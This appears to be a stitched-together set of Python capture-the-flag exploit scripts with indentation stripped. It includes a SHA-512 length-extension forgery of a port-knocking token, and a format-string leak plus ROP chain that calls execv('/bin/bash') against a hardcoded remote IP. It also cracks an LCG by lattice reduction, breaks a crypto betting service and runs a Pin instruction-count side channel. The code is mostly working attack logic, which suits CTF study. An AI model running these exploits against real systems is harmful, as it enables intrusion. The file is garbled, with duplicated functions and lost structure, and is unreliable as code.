def main():
if 0:
test()
return
sp.check_call(get_cmd('setup', '80'), shell=True)
global token
token = sp.check_output(get_cmd('newtoken', str(authorized_port)),
shell=True)
print(token)
token = binascii.a2b_hex(token.rstrip())
with Process(get_cmd('serve'), shell=True) as x:
time.sleep(0.5)
mac = token[0:64]
msg = token[64:]
extra = struct.pack('!H', want_port)
print(len(token))
suffix, valid_token = length_extension(HashType.SHA512, mac,
secret_len + len(msg), extra)
print(valid_token, msg, suffix)
knock(valid_token + msg + suffix)
pattern = PatternMatcher.fromre(
b'(allowing host [^\n]*\n|bad message)')
while True:
res = x.recv_until(pattern, timeout=1)
if not res:
break
print(res)
def main():
if 0:
test1()
return
if 0:
test_suf()
return
if 0:
print(get_num([8, 9, 10, 11, 12]))
return
sp.check_call('waf -vv --out=build configure build', shell=True)
with open('/tmp/test', 'wb') as f:
tmp = os.urandom(4)
tmp += b'a' * 0x100
tmp += b'\x00' * 0x1
tmp += b'Z' * 0xe5
tmp += b'\x80'
tmp += b'5' * 26
f.write(tmp)
#x = X86Machine(False)
#res=x.get_disassembly('push 0x08049e58;ret')
# print(binascii.hexlify(res))
# return
if 0:
run()
else:
with Process('./gitzino/gitzino_nofork_nopriv',
want_stdout=None) as unused:
time.sleep(0.1)
run()
def pin_run(content):
cmd = 'stdbuf -i0 -o0 pin -t ~/programmation/tools/pin-3.7-97619-g0d0c92f4f-gcc-linux/source/tools/ManualExamples/obj-intel64/inscount0.so -- ./magic'
print(content)
with Process(cmd, shell=True) as p:
p.recv_until('Enter key')
p.send(b'\n'.join(content))
p.close_stdin()
res = p.get_to_end(1)
with open('./inscount.out', 'r') as f:
inscount = int(f.read().split()[1])
return res, inscount
def solve():
remote = 1
if remote:
conn = Connection('52.6.64.173', 4545)
else:
conn = Process('./ebp')
with conn as x:
data = ''
for i in range(60):
data += '{}:%08x '.format(i + 1)
data += '-1END\n'
x.send(data.encode())
res = x.recv_until(PatternMatcher.frombytes(b'END\n'))
res = res.decode()
tb = [x.split(':') for x in res.split(' ')]
tb.pop()
tb = {int(x[0]): int(x[1], 16) for x in tb}
print(res)
global id_base_addr
id_base_addr = tb[4] - 0x18 - 0xc - 3 * 4
g_int80 = 0xf761fa63 - 0xf7584979 + tb[44]
mk = tb[12] & 0xffff
if not mk < 0x300:
return False
expected_exit_off = 0xf7621150 - 0xf7619979 + tb[44]
print('cxa should be at >> ', hex(expected_exit_off))
y = X86Machine(0)
print(hex(tb[44]))
#disp_ins(x, y,tb[44]-libc_id_off, 20)
if 0:
c = code.InteractiveConsole(locals=dict(locals(), **globals()))
c.interact()
return
if 0:
while True:
try:
data = input('next addr? ')
data = data.split(' ')
addr = int(data[0], 16)
n = int(data[1])
res = do_read(x, addr, n)
print(res)
#disp_ins(x, y, addr, n)
except KeyboardInterrupt:
raise
except Exception as e:
print(traceback.print_exc())
pass
libc_start = tb[44] - 9
if remote:
execv_off = 0x9b100
else:
execv_off = 0x000b3140 - 0x00018570
g_execv = libc_start + execv_off
g_pop3 = 0x80485dd
need_write = (tb[12] - 0x20) & 0xffff
target = tb[12] & ~0xffff
target_start = 0x340
target += target_start
g_pop1 = 0x8048385
rop = RopBuilder(target, 4)
rop.add('I', tb[12])
rop.add('II{I:_ref_path}{I:_ref_argv}{I:_ref_env}', g_execv, 0)
rop.add('{#argv}{I:_ref_path}{#env}I', 0)
rop.add('{#path}{"/bin/bash}?', 0)
buf = rop.get()
print(buf)
for i in range(len(buf)):
write_ctrl_addr(x, target + i)
write_addr(x, buf[i])
write_ctrl_addr(x, tb[4] - 0x20)
disp(x)
input('final write')
write_addr(x, target_start, buf, 0)
c = code.InteractiveConsole(locals=dict(locals(), **globals()))
c.interact()
time.sleep(1)
res = x.recv(1024)
print(res)
res = x.recv(1024)
print(res)
res = x.recv(1024)
print(res)
res = x.recv(1024)
print(res)
input('finish')
return True
def test(ctx):
print('on test')
px = Process(['/usr/bin/python3', './lcg.py'])
#px = Connection('lcg.eatpwnnosleep.com', 12345)
with px as conn:
lst = []
nx = 10
for i in range(nx):
conn.send('123\n')
res = int(conn.recv_until('\n').strip())
lst.append(res)
print(lst)
return
mguess = 0
tb = []
for i in range(nx - 3):
s0 = lst[i]
s1 = lst[i + 1]
s2 = lst[i + 2]
r = lst[i + 3]
d = r - s2
tb.append((s0, s1, s2, d))
hist = []
for i in range(3):
hist.append(tb)
ntb = []
for j in range(len(tb)):
for k in range(j):
u = []
x = tb[j][0]
y = tb[k][0]
for ii in range(1, len(tb[j])):
u.append(tb[j][ii] * y - tb[k][ii] * x)
ntb.append(u)
tb = ntb
mguess = gcd_list([x for x, in tb])
x0, y0, z0, m0 = 6181369669767163407, 5407744839835496434, 8744744311366254845, 10714829862921516198
if 1:
coeffs = []
for e in reversed(hist):
lx = []
for x in e:
d = x[-1]
for i in range(1, len(x) - 1):
d -= x[i] * coeffs[i - 1]
d %= mguess
print()
print(x)
print('aaaa', (d - x[0] * x0) % mguess)
g, u, v = gmpy2.gcdext(x[0] % mguess, mguess)
#if g!=1:continue
print(d, g, d % g, mguess, x0)
print((x0 * d - g) % mguess)
print((y0 * d - g) % mguess)
print(((x0 - y0) * d - g) % mguess)
assert d % g == 0
lx.append(d // g * u % mguess)
print((d - lx[-1] * x[0]) % mguess)
print(gcd_list(lx), (x0 % lx[-1]) % mguess, lx[-1])
assert len(lx) > 0
coeffs.insert(0, gcd_list(lx))
return
m, tsf = make_sparse()
TGT = 2**128
M = 2**64
nv = nx - 2
for i in range(nv):
m[0][i] = lst[i + 2] * M
m[1][i] = -lst[i + 1] * M
m[2][i] = -lst[i + 0] * M
m[3][i] = -M
m[4 + i][i] = mguess * M
m[4 + i][4 + nv + i] = 1
m[0][nv] = M
m[1][nv + 1] = 1
m[2][nv + 2] = 1
m[3][nv + 3] = 1
m = tsf(m)
res = call_sage(lll, m)
for i in res:
if i[nv] != 0:
u = i[nv] // M
x = i[nv + 1] // u
y = i[nv + 2] // u
z = i[nv + 3] // u
s0, s1 = lst[-2:]
for i in range(nx, 32):
ns = (s0 * y + s1 * x + z) % mguess
s0, s1 = s1, ns
conn.send(f'{s1}\n')
conn.interactive()
def main():
dsa = DSA.generate(512)
data = [dsa.key.y, dsa.key.g, dsa.key.p, dsa.key.q]
data_str = ','.join(map(str, data))
chunk_size = 64
chunks = []
for i in range((len(data_str) + chunk_size - 1) // chunk_size):
tmp = data_str[64 * i:64 * i + 64].encode()
chunks.append(binascii.b2a_hex(server_pub_enc.encrypt2(tmp)[0]))
enc_key = b','.join(chunks)
n = 0x345080e693fa74f29d5ccac2f13556bea2541231949e14d7cd86068e5adcbc3d5622936f770fab224beea0da967057fdd9cd8419561c77445fa8b358720afc9f3703acc4b3b6901140587d83477fd271d3499797f9582bb1a5c985804ff905055cc4efecedd70cacc219ca3ba49537d6268ab66aa1c639c1963e089f3a63aac9b8b
n = 0x167c731ae38435961bd5322b2b0ec685027147d194b8096fc2bcadacbece96d29b11c93dff0417644387aaca8cbdaa3bc895fd787c8fed999c19efcda1b0603b79370e675fc3a7e5536c8b07566b845a2fb513735d7ddb5051d04fe129eae00f17896ca892087388249b4e68acf46ed6938338a03b3a542b2c20f861cbc86eab10751
n = 0x3ada6f51c3e3009b4b63bb14b710624f321248b12741559e29a487eaaa05167dfd9f712e1825769ba612595b81945e0def05c379cc11a4419a3bfa00f14c6ca43ec21306955fc16621025898b59219cc1c4e0474719dbc715f9c31344c9af39a3d954fedc39651f244ee2c333fe257125a97d4db45135b53eb2383714f302bcf6b6
n = 0x29b32eb59e7ee1c467e1cc952af0d531d9d3128fbd6aecab8394fddc016e7786267b212bdaf6d343fef51a7a8ebec644c65d040f70b99e5a5c570024328431d17800ecd478bcb6fb92c0dfd76fd7cea637d9317c1cdd90b9b30f548daa7e39fb5a9d289246e4b90ec665e797bc76587d4d19e2edb2e6269621910f83b17726240de12c18e69a
n = 0xc56f3ad5b3eca2ea9920c4fb01a84bf6538e2a5dd9f776a9fa1b22590a8609bb4a03ed13c7c07aa82d792c5676c8296381518838b03444079604b88b1d5048d2da88c036201c1599da302532b94a0ba9902750748d491bbfb1c0da674b6cbba0c1fb6bb693080eabdd0c7096757c8b80fe8ca6d82cb1bc5151a30fa40f9ea982675b1
k = RSA.construct((n, 12))
x = PKCS1_OAEP.new(k)
assert len(sys.argv) > 1
with Connection(remote, remote_port) as conn, Process(sys.argv[1]) as proc:
print('ENCRYPT MOFO')
try:
len_sig = len(x.encrypt2(b'kfwefappa')[1])
except:
print('EJSUS FAIL')
raise
print('ENCRYPT MOFO')
sent_sig = 'YOU KAPPA F**K'
prefix = '\x00' * (len_sig - len(sent_sig))
sig = prefix + sent_sig
sig = sig.encode()
db = []
y = Oracle(proc)
y.send_num(hex(n)[2:].encode())
odd_max = 2
if 0:
for i in range(0, odd_max):
s = get_guess_for(i)
print('ON STEP >> ', i)
nbit = 10
for A in range(2**nbit):
s2 = ''
for j in range(nbit):
if A >> j & 1:
s2 += ' '
else:
s2 += '\n'
s2 = s + s2
gen = x.encrypt2(s2.encode())[1]
print(gen)
print(hex(n))
work = gen
res = y.get(sig, work)
if res:
db.append(res)
break
else:
assert False
else:
db.append([
b'a0fbbacc479a8a3af09aebdbb9ae30834a10699d9d618108514d88f308161577809ae60e182c75e0f95797806179363a4c17da900373a3879ac3a692dc5f8f8b1e022eee294dd7013858394fa2f366179f64c9ab0ff28c89b3a78b1a6b6a8852de7a3f5de4dbe6ae0667941e8283f4c3eaa22572cc4dd4dceef54251bd3cf4690d301',
b'2a1fed419b80c8145524c84c9c1f2efdf598d18da0eecfd2892a8956358827e613cf05c505e9b902277727c889a7ff32ea0b4bbe018fc8acc33743cfa14d31597a0e879135edc1257c8815208817dc7f6ed470c4e75742890ec7f7604c7025afa4f0f6193e3df2925320553ea1c9be3982369dd2b35b2b858fc7ea029e132693e355'
])
db.append([
b'42de041b5d51a89aa133a02dcb108a0714344d6cd0e23cee44d0e64a7c03fcd7163a8195f106ab8664215d9d13efa63871189ddbf25a7aedb1803c6ae5d8c75bd3aa78ac934f68ff1b55d4984bd66b8e79d1b490d553f1f0b3d93c04101e78603e94e5577f6525f934bef8016497820831e9e6a4571e446334a98e1b9d99f015a1735',
b'70f611574824ae1ca492657f842feb2fea44283f7e7cc1da42997df2a54402975a490b9ca3990c95536c93c317976d7db1c844575b5f3f12bd9cc4f83808f31635749dd58da1b4cb392b08131766472895db3beb16f5317f4477a0df71f84c22de477066ce0bc4468df5a68e2527390c561c8c177b823f824b6926acf17599447f509'
])
print('sending')
conn.trash(1)
conn.send(enc_key)
while True:
time.sleep(0.5)
pattern = b'You have \$([0-9]+)\)\n'
res = conn.recv_until(PatternMatcher.fromre(pattern))
monies = int(re.search(pattern, res).group(1))
assert res
conn.send('{}\n'.format(monies))
conn.recv_until(PatternMatcher.frombytes(b'At what odds'))
conn.send('{}\n'.format(odd_max))
conn.recv_until(PatternMatcher.frombytes(b'Alright, what is your'))
send_with_sig(dsa, conn, binascii.b2a_hex(sig))
res = conn.recv_until(
PatternMatcher.frombytes(b'Now what is your'))
rng = re.search(b'the secure RNG is ([0-9]+)\n',
res).group(1).decode()
rng = int(rng)
print('rng is >> ', rng)
want = rng % odd_max
uu = get_rsa_key_from_db(n, db[want])
print(uu)
privkey = PKCS1_OAEP.new(RSA.importKey(uu))
guess = privkey.decrypt(sig)
guess = int(guess[len("I hereby commit to a guess of "):])
send_with_sig(dsa, conn, uu)
def run():
with Connection('localhost', 17171) as conn:
with Process('./build/gitzino/distribute/gitzino_solve query',
shell=True) as oracle:
x = Server(conn, oracle)
x.solve()